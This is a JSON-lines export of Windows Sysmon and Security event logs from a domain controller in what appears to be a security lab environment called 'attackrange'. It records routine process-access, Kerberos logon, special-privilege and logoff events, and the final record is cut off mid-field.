{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6990,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.039\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:40.039","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220690,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA0499\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xa0499","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220691,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xA0499\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{80FFBC81-7395-8B57-4499-E8ABB785839F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t0\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xa0499","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{80FFBC81-7395-8B57-4499-E8ABB785839F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"0","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220692,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA04E4\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xa04e4","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220693,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xA04E4\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{80FFBC81-7395-8B57-4499-E8ABB785839F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t10.0.1.14\r\n\tSource Port:\t\t52731\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xa04e4","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{80FFBC81-7395-8B57-4499-E8ABB785839F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"10.0.1.14","IpPort":"52731","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6991,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.149\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1056-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:40.149","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1056-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220694,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA054B\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xa054b","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220695,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tDelegation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xA054B\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{80FFBC81-7395-8B57-4499-E8ABB785839F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t52732\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xa054b","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{80FFBC81-7395-8B57-4499-E8ABB785839F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"52732","ImpersonationLevel":"%%1840","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220696,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA04E4\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa04e4","LogonType":"3","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220697,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA0499\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa0499","LogonType":"3","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6992,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.149\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 